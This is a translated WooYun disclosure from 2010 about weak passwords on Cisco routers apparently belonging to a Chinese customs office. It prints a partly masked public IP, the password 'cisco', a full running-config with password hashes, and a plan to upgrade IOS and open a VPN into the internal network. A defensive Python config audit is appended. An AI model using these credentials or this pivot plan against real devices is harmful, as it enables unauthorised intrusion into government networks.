Vulnerability Summary
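Bug ID: wooyun-2010-0246
Title: Weak passwords on multiple tiers of routers at a customs office
Vendor: a customs office
Author: 路人甲
Submitted: 2010-08-21 16:22
Fixed: 2010-08-23 21:53
Disclosed: 2010-08-23 21:53
Type: Infrastructure weak password
Severity: High
Self-assessed Rank: 20
Status: Vendor could not be contacted, or vendor actively ignored the report
Source: http://www.wooyun.org (for questions or help, contact [email protected])
Tags: none
Vulnerability Details
Disclosure status:
2010-08-21: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2010-08-23: The vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
Its IOS can be upgraded and a VPN then configured, successfully intruding into the internal network.
Detailed description:
Device IP address: 218.85.xx.xx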
User Access Verification
Password:
Password:
JY-Haiguan>
JY-Haiguan>
JY-Haiguan>en
Password:
JY-Haiguan#sh run
Building configuration...
Current configuration : 1130 bytes
!
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname JY-Haiguan
!
boot-start-marker
boot-end-marker
!
enable secret 5 $1$JEYw$lIZhB3ferYKGuCC835ugm1
!
no aaa new-model
!
resource policy
!
ip subnet-zero
!
!
ip cef
no ip dhcp use vrf connected
ip dhcp excluded-address 192.168.1.254
ip dhcp excluded-address 192.168.1.252
ip dhcp excluded-address 192.168.1.253
!
ip dhcp pool jiangyin-haiguan
network 192.168.1.0 255.255.255.0
default-router 192.168.1.254
dns-server 202.101.xx.xx
!
!
ip name-server 202.101.xx.xx
!
!
!
!
interface FastEthernet0/0
ip address 218.85.xx.xx 255.255.255.128
ip nat outside
duplex auto
speed auto
!
interface FastEthernet0/1
ip address 192.168.1.254 255.255.255.0
ip nat inside
duplex auto
speed auto
!
ip classless
ip route 0.0.0.0 0.0.0.0 218.85.xx.1
!
ip http server
ip nat inside source list 10 interface FastEthernet0/0 overload
!
access-list 10 permit 192.168.1.0 0.0.0.255
!
control-plane
!
!
line con 0
line aux 0
line vty 0 4
password 7 00071A150754
login
!
scheduler allocate 20000 1000
!
end
JY-Haiguan#
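A 25-bit subnet mask, 128 public IPs. Although it is not in the core topology, I casually tried a few, and the upstream and downstream devices all use weak passwords too, which made me sigh.... The deeply ingrained weak password "cisco" has once again played a powerful role.
This IOS version does not support VPN, so the version has to be upgraded; the configuration is retained afterwards, but the device reboots, and after the reboot one can connect to its internal network over VPN to carry out penetration.
I looked it up; it should be a router of Fujian Jiangyin Customs, only used to do NAT for a small network segment. But intruding into the whole topology through it is still fairly easy.
Proof of vulnerability: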
218.85.xx.xx
password:cisco
Fix:
Increase password complexity.
Copyright notice: when reposting, please credit the source 路人甲@乌云
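An added example, not part of the original report: a small Python audit that flags the weaknesses visible in the running-config above (shared type 7 line password on the vty lines, AAA disabled, HTTP server enabled, no SSH-only transport or access-class). The finding names and the hardened sample config are assumptions constructed for illustration.

```python
import re

# Excerpt of the running-config in the report (indentation was lost on the page).
REPORTED = """\
no aaa new-model
ip http server
line vty 0 4
password 7 00071A150754
login
!
"""

# Constructed hardened counterpart: an assumption, not taken from the report.
HARDENED = """\
aaa new-model
aaa authentication login default local
no ip http server
line vty 0 4
 access-class 23 in
 transport input ssh
"""

def vty_blocks(lines):
    """Collect the sub-commands of every 'line vty' section ('!'-delimited)."""
    blocks, cur = [], None
    for ln in lines:
        if ln in ("!", "end") or ln.startswith("line "):
            cur = None  # any section boundary closes the open vty block
            if ln.startswith("line vty"):
                cur = []
                blocks.append(cur)
        elif cur is not None:
            cur.append(ln)
    return blocks

def audit(config):
    """Return the set of finding names (hypothetical labels) for one config."""
    lines = [l.strip() for l in config.splitlines() if l.strip()]
    hits = [("aaa-disabled", "no aaa new-model" in lines),
            ("http-server-enabled", "ip http server" in lines),
            ("type7-reversible-password",  # type 7 is obfuscation, not a hash
             any(re.search(r"\bpassword 7 \S", l) for l in lines))]
    for blk in vty_blocks(lines):
        hits += [("vty-shared-line-password",
                  "login" in blk and any(l.startswith("password ") for l in blk)),
                 ("vty-not-ssh-only", "transport input ssh" not in blk),
                 ("vty-no-access-class",
                  not any(l.startswith("access-class ") for l in blk))]
    return {name for name, hit in hits if hit}
```

A fuller audit would also confirm that the ACL named by `access-class` exists and that local accounts use strong, unique secrets.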
Vendor Response
Vendor reply:
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 6 (WooYun rating)